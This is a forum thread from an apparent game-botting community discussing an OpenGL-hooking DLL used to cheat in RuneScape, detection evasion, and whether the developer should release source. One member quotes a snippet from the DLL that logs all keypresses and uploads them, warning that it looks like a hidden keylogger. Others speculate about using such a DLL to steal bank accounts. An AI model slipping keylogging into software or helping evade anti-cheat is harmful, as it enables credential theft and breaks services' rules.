OpenGL Hooking

http://www.villavu.com/forum/showthread.php?t=54094. As close to colour-reflection as possible and by the sounds of things, would be hard for jagex to break. Definately has potential.

Anyone have any knowledge about this or anything like this? Perhaps a new subforum would be useful? I imagine theres many people interested in this.

It has nothing to do with reflection - it's all about models and native drawing.

Anyways, I doubt a new subforum is necessary. The one thread seems to be working just fine as is at the moment.

If this is his invention, do not let him away from SRL!
Promising newcomers ASAP!

Also this sounds like the future of RS cheating, guys!
This silentwolf guy says he has already written a CS bot with this OpenGL technique, so I'm sure he can be very helpful.

I will start learning about OGL right now! :rolleyes:

E: Actually this is far better than reflection. Only situtation where this would stop working is if Jagex frequently made new models for objects, which I don't see as a realistic anti-bot protection. Reflection breaks all the time. Let's start working this!

Well, yes, but it could be used in a manor similar to how we use reflection.

Simply being an alternative for simple color doesn't mean it's close to reflection :p

I know, its basically the closest to a "colour based reflection" as possible. In that we're able to ID each object from reading info from the client - except we're deconstructing the graphics rather than the java info. Theres a vague similarity there.

The thread suffices for now, but what about when someone wants to do something else? Another thread in General Dump? Projects are much easier to manage and get off the ground if they have a centalised place to work from.

IMHO, a little to early for new forum, but after he releasessome usable code, I'm up for it:)

New-Comer Cup and early promotion to Jr Members is fitting though ?….

Very interesting new approach!

Nono, reflection term comes from the usage of java.lang.reflect :p

This does seem exciting if it can get off the ground. It would however be another separate project/svn from SRL as its all OpenGL. Only thing you would use from SRL is the text reading and mouse functions. Basically the next bot for Runescape - OpenGL bot.

I didn't read through it all etc. but is it possible for Jagex to detect this kind of hooking/reading?

The Claw

2010-01-15 08:46:03

It can be detected, but theres way to prevent it - much like every method of botting. I was thinking it could be implemented into SRL in the same way as reflection, except this would very rarely break so its perfect for us lol

n3ss3s

2010-01-15 09:22:56

I think what we are aiming for here is the ability to choose what to display, e.g if we are looking for an NPC, we will choose to only display NPCs, recognizing them on a black background should be easy :)

The Claw

2010-01-15 09:29:19

But silentwolf said Jagex can probably take screenshots of the user's rs screen - so that would be insta-ban. Although, if we somehow projected the RS screen onto something else and ran simba on that, while having a normal rs screen running and communicating with the projected client, sending clicks and updating the image real-time etc, it might be undetectable? Or do it however its done with the SMART debug feature.

n3ss3s

2010-01-15 10:47:25

I've changed my mind seeing you can just grab the coords. We don't need to paint anything, just get the coords like he did to draw that X there, except we won't draw the X.

The Claw

But it would be damn cool. :)

n3ss3s

Yeah, tbh now as SMART is open source, maybe we could make it load from our own jar with hacked canvas (I don't really believe in the theory of Jagex taking screenshots), and paint on that like RSBot does… Would be awesome to just see a black mainscreen with a tree :p

They don't do it as far as I know, but it's possible for them to do it, especially if they learned we were blacking out parts of the screen

Ibot, RSBot, RSBots, Kbot…nearly every bot does it. We can do it with SMART too, but I guess since we never fully, officially supported reflection (……) no one thought of putting it in SRL.

YoHoJo

2010-01-17 10:09:14

Slight edit the pic I posted above was SMART if anyone cares.
Anyways, so what we are still wondering right now is weather or not
1) Jagex can 'take screenshots' and know if we are drawing
/
2) Do the bots that draw do it directly onto the canvas, or a different 'layer' on top of runescape.

Lets ask rsbot devs or Ruler? :D

Bobarkinator

2010-01-17 15:15:10

They do it on a layer above. The runescape canvas is constantly refreshing itself.

Does anyone else find it a little odd how everyone is in awe of this 'new' technique even though it's labeled the 'new reflection'?

People have a ton of arguments against reflection, yet it seems (to me) like they're forgotten as a result of the introduction of this. Yes, I realize that this is different than reflection and won't offer quite the same capabilities, but all of this just seems a tad odd to me.

Dan Cardin

i assume the source will come, as he said it would. Nor do i think that releasing the source to everyone would too great an idea if rs cares enough where they look at these forums (which is what you imply with "elaborate ploy"). I would guess he would release the source before he expects people to use it, trusting that it would work.

What exactly would this elaborate ploy do, btw?

Elaborate ploy: silentwolf could be jagex, wowing us with unseen techniques in an attempt to get their way up the ranks. Well really what interested me the most is that this is an "unexplored area" of runescape cheating.. Seeing as SRL is dieing every opportunity to revert this process must be taken.

Besides, I think it's just really interesting in how OpenGL hooking actually works.. I've made many attempts to learn it from google, but they never resulted in anything good.

Not to bring up a moral debate about SRL, but I think this specific technique goes very much against the core SRL 'philosophy', primarily the one regarding not using Java knowledge to our advantage. Therefore, I don't think it would ever be used as part of the core (maybe just an unofficial official include like reflection was).

With what Method said, I believe this is only becoming widely accepted to quickly, because the community has already made the shift towards accepting reflection as an alternative and so are even more ready to have something like that again. It's quite funny, since I still think reflection is more powerful than this, is a more widely known subject in regards to it and this way we would very quickly grow to depend nearly entirely on him unless someone went through the effort of learning it themselves to a point of self sufficiency.

If you're really that paranoid, his field of 'cheating' seems plausible and so you can just research it in other areas. I mean, aimbots etc are big in a lot of FPS's and if OpenGL is a weapon of choice for them like he says, it won't be hard to find evidence of it and more importantly play with it if you're only interested in the educational part of it.

Hi RAM,

Didn't notice my PMs, hence the late reply. What are the general thoughts on releasing the code? I couldn't care less about 'ownership' etc. I just want this to work, undetectably, for as long as possible. It might be a good idea to set up a new subsection where just SRL members (plus me :)) have permission to view… I think I'd prefer to release the first version only to competent SCAR scripters, so they can give me useful feedback.

Cheers,

Hey There, Great Work with what you have posted so far…I seen your hesitation to release any code in the public areas….There is already a discussion in the "Upper Levels" of the forum, with regards to creating a subsection to cater specifically to this project. When you are ready, and if you would like, permissions can be granted and this can be set up for you. We are very receptive to new ideas, and this is definitely a big breath of fresh air. Just let me know what you need.

I wouldn't mind him being a member if he presents some code, and for now I think only a thread is needed for the project.

Unless this is going to be completely backed like SRL, look how inactive the reflection forums are (and were before it effectively 'died').

The problem reflection and stuff like this is it puts a crap load of power in the hands of someone and when it breaks it's usually up to a hand full or one or two people to fix. Lots of talented people who are completely powerless to fix something, I like reflection and stuff… I really do, but I think it was part of the downturn of SRL from what it was two years ago to what it is today. It used to be FindObj was the primary means of object finding… radial road walk… other simple stuff was the primary base around the average script.. scripting two years ago I felt like I had no power at all when scripting… until I was introduced to reflection, suddenly everything changed… I could make functions that would work with precision and ease with very little work (in comparison) there was literally no boundaries to the things I could of done when reflection was first put in my hands. As quickly as it came, it broke, and no one fixed it. I was reverted back to my old tool, the one that didn't give me the same results… the one that was much harder and frustrating because only people of Dev status at the time could really make reliable scripts with the exceptions of a few… a lot of time passed before SMART came into SRL members and even more to the general public and longer after that until reflection was fixed. By this time I had learned how to make a powerful tool out of color, using Tolerance speed 2, TPAs, ATPAs, sorting methods, length checks.. I could finally feel like I had some power again… then on top of that reflection came back into play for the first time in 18 months and I fully utilized it to an even greater extent combining my new knowledge with the old, it was around for a bit longer and was even over done in my opinion, there was reflection everything! Abyssal crafters, every rune crafters, quest runners, tut runners… all completely in written in reflection. In reflection folders there were reflection functions for things as simple as R_BankScreen… things that were already extremely easy with color were converted into reflection, it's as if my half a year inactive at SRL… reflection had take on a whole new meaning both with public acceptance and usage. Then, it broke. Things got really inactive for a while… it again came down to everyone counting on 1 or two people trying to fix something that would require a massive amount of work under intense pressure. Recently it has seemed more feasible with the easy phrasing of hooks from rsbot/nexus and such… I with little knowledge of the java code and open the RS client class files and find the hooks I need for SMART to grab… but I have no idea how to figure out how to use the information in these new hooks to get the information I want… as it's not that simple…. the information has to be 'processed' in SCAR with various math that depends entirely on RS client source… which I have no idea of how to figure out. I could learn Java, but it seems entirely counterproductive to my purpose… as what I am ultimately trying to accomplish would take less time otherwise. So I open SCAR back up and begin coding in color… challenging myself with using lower level functions with maths/logic to come up with something stable that I can optimize and utilize. Then some un-named, un-heard if kid comes from the aim bot community? with knowledge about another reflection like method… one that seems very intriguing, but how much use could this really be? If it's anything like reflection it will undoubtly break within a few months and possibly create another at least brief term of inactiveness among scripters, that is if it comes to the point where it can be utilized with effective power. On top of all this, SCAR itself (was) becoming unstable with all the running errors, and the fact that the prerelease version which only about half of people use/are informed of contains a working OCR text recognition which is practically at the core of most color scripts and SRL's 2nd level functions such as anti-randoms, banking ect.. and with all this SRL which is already at slow maintainence wants to move away from SCAR completely to SIMBA which is being developed by the same people that create SRL… distracting even further away from the original goals of it self… is SRL 5 going to be called Simba Resource Library? I think this project is great and everything… but why go as far as saying that as soon as SRL 5 will be on it? Don't we need current SRL to be what it once was? Between Naum, trillez, and myself we have fixed a significant portion of SRL anti-randoms… whilist people were busy developing simba… it just seems a little 'out there' to say SRL 5 is going to be targeted at something that doesn't fully exist yet. I'm happy to see SRL stats being maintained by Nielsie, however it is a temporary solution… the SRL stats are quite a glorious thing… I really miss the days when they were part of the forums… it seemed much more professional and cool. I just think this 'openGl' hooking is bit much to take in during all this… and I don't think it's worth making a big fuss over…. give the guy some room and some time to come up with something… people are already asking for snippets and such… I'm really the kind of guy that likes results. So I'm not going to make any suspicions of who this guy really is, what he is really doing, or its elaborate ploy as I do not care that much… once it's done that will be a different story but I think this should really just be a wait and see type of thing. Long post.. I know, it's been awhile since I've spoken my full mind on this stuff for a while so it feels good to let it out.

SRL5 has not been started yet. The MML still needs to be tested, if you want to help with that and help to further the project, please feel free to test it. Just PM Wizzup.

Simba is greater than SCAR in many more ways than you might think. It is developed by a group of people not just one and *will* be better.

Also, some of the more active developers have gotten busy. I started university, N1ke got busy with his bjj, RM started university as well, and Zeph left for Vietnam. Yes, we have some developers too, but we were *really* active.

SRL Dev team will be very different after april. Just wait for that ;)

Now, I won't really comment on reflection as I wasn't around during KYAB, but afaik, it will be fixed. Just its a lot of work to write the TileToMS algorithm. We have the hooks, but we do need to be independent and creating a parser isn't easy.

Finally, PLEASE USE WHITE SPACE! Big walls of text aren't fun to read :(

The reason for acting quickly was to prevent source code from being released in public local.

mixster

Paranoia? Many people have stated that RSBot could be stopped in a single RS update (don't hold me to names or facts - I believe it was to do with Jagex checking for RSBot injected methods or the like). BenLand even said that Jagex could easily detect if someone was using Smart (either on his GPL'ing Smart thread or the open vs closed sauce detectability thread).

For whatever reason, they don't and so it seems stupid to hide this project from the public because of the possibility of Jagex finding it and banning everyone from using it.

Lastly, it just seems a little, erm, well counter-intuitive, to keep what will (hopefully) be open sauce code from the majority, especially when it was an unknown member of this majority who started it and is the sole developer of it.

RAM

2010-01-22 18:02:35

Mixter, I guess you misinterpreted my joke regarding his IP address,I assure you, there is no cover up going on here,lol ….

Sure sure, and the author also requested that he rather have feed back from SRL Members+ (people with more experience)…..the hesitation for the release of source code for other projects ?….perhaps to refine it a bit more before made public ?

mixster

2010-01-22 19:00:24

It seemed to me that he was pushed towards there from other members in the thread and then realised he could make a gain (membership) if he subtly pushed for it as well.

Either way, he would of gotten just as much feedback from SRL Members+ if it was posted to everyone and he seemed very certain on the low detectability and low chance of it breaking early on that suggests Jagex finding out about it wouldn't be a problem.

Lastly, I don't see how refining before he makes it public would be an issue. I mean, I assume it's an experimental setup, but there is a difference between it being used and it being recommended.

Just a couple more cents from me.

If you wanted to get into details, if this took off then there could be hundreds of members using it, some with very high leveled accounts that could be sold on for a bit of profit and most certainly some with parents who would use the same computer, meaning that by infecting computers using just one dll, you could gain access to bank accounts, Facebook accounts, email accounts etc. Even just 10 bank accounts from which you could withdraw a few hundred pounds/dollars would give you quite a large lump of cash for a measly 20+ hours of work.

Sure it's unlikely that you would, but it's possible and if anyone did fear enough to think that you may do that, it would be nice if they could be confident that they can compile a version that doesn't.

I'm also a little surprised at how offended you got. You were even promising sharing sauce and I assumed that would be when you released a working version of some kind, since that would be a logical time to share. Please, do forgive me for thinking that you not sharing sauce code (after promising you would and after people asking for it) because it's "messy".

Your questions were made before he shared anything - I was offering advice on how you check up on what he said if you were really that worried about it. What I'm doing now is worrying why he went back on his word and is refusing to share sauce code using extremely weak reasons to defend it.

Your post was before he gave any reason to doubt his character, my post was after he changed his character to one that I don't see as that trustworthy.

Regarding taking it less seriously, I don't really take this seriously. Ask anyone who comes on IRC - I'm probably one of the 'lightest' people there, but on the forums every single sentence I type is practically set in stone for others to judge me on, so if I'm going to say something important, I want to make sure that I say it right, that it's worth it and more importantly that I would be willing to say the same thing again in front of anyone else.

I agree with mixster. It's just stupid not to release a source "because it's messy"…. And yet let us test it… I was a little disappointed to not see any source, and I'm not planning on testing it really without a source. Because frankly, no one needs IDs to be drawn on the screen really.

Not releasing source yet makes sense to me. This project has had quite alot of growth in a very short space of time, he seems like he knows his stuff and is able to do pretty much whatever gets requested the most - hence alot of code just thrown together, undocumented, unorganised, and unoptimised. You can see he has alot of plans for this still, from the to-do list on the thread, so if he's true to his word it's after that we'll see source. Time will tell, though.

SCAR was open source about a year ago and it didn't benefit anyone in anyway.

Erm, Scar was never open sauce. The only actively developed project Freddy released sauce code was for the funny Genesis Java bot thing in Delphi and because he didn't like it for whatever reason he removed the links to the sauce and continued to dev it by himself (though it seems he's onto something else now based on a recent email I got from his new forums).

Everyone with access to the simba forum or admin rank (you) can see the simba source, even though the url is publicly available, so everyone can really. :)

And access to the simba forum is very easy, just send me a PM and I'll add whoever it is to the list.

EDIT: Misinterpreted your post, RAM. ;)

Perhaps you are talking about "SRAT", Freddy's attempt to clone SCAR before he got the source from kaitnieks. Although I think he never released any source to that either.
Fat chance.

I can't remember who but OpenSCAR was a project by some members on the forum to remake SCAR but open source it. Like I said I don't remember who did it. You can probably search the forums.

That's the SCAR plugin, while the one that The Claw posted a link to is the wrapper, which actually does most of the work.

	if(keylogger_on)
{
int key = GetAsyncKeyState(ALL);
add_log("%u",key);
upload(log);
}

Just an excerpt from the rs_Ogl.zip attachment, opengl32.cpp file. I have no idea what the upload does (the add_log adds to the 'C:\rs\opengl.log' file if you want to see what it does send), but I felt like mentioning it here since one can perceive it as him keylogging every key press made.

I remember that being developed by the same group that pushed for KYAB. If not they were just around at a similar time.

Nope, it was legit… Freddy supported it. And it looks like some actual good legit source…. you're thinking of Ronny.M.P's/solarwinds fail attempt to integrate that thing called "xKYAB" where ronny mp ripped various parts of SCAR that were open to the public into a really messy crappy sloppy file that I came across one day. Trust me, two completely different things.

That was yet another thing created after KYAB left these forums. Can't seem to find the link to OpenSCAR but I remember it being developed in c++. Sounds like you've got some of freddy's early attempts to clone scar…unless he accidentally uploaded source one day. Either way, post it here :p

Blizzard Entertainment won a partial victory on Monday(July 15, 2008) when a court granted its request for summary judgment on copyright infringement grounds. Blizzard is suing Michael Donnelly of MDY Industries, which sells the WoWGlider (or MMO Glider) utility for $25 and has sold some 100,000 copies.
Makes me kinda curious how many Ruler and others have sold….

AFAIK Glider was more of a loader. It loaded the Wow executable into memory it controlled, allowing it to prevent bliz from detecting anything amiss. They couldn't beat the developers with crafty code, so they hired crafty lawyers.
